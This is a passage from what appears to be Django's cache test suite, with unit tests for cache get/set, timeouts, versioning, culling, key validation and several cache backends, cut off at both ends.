self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnoreDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
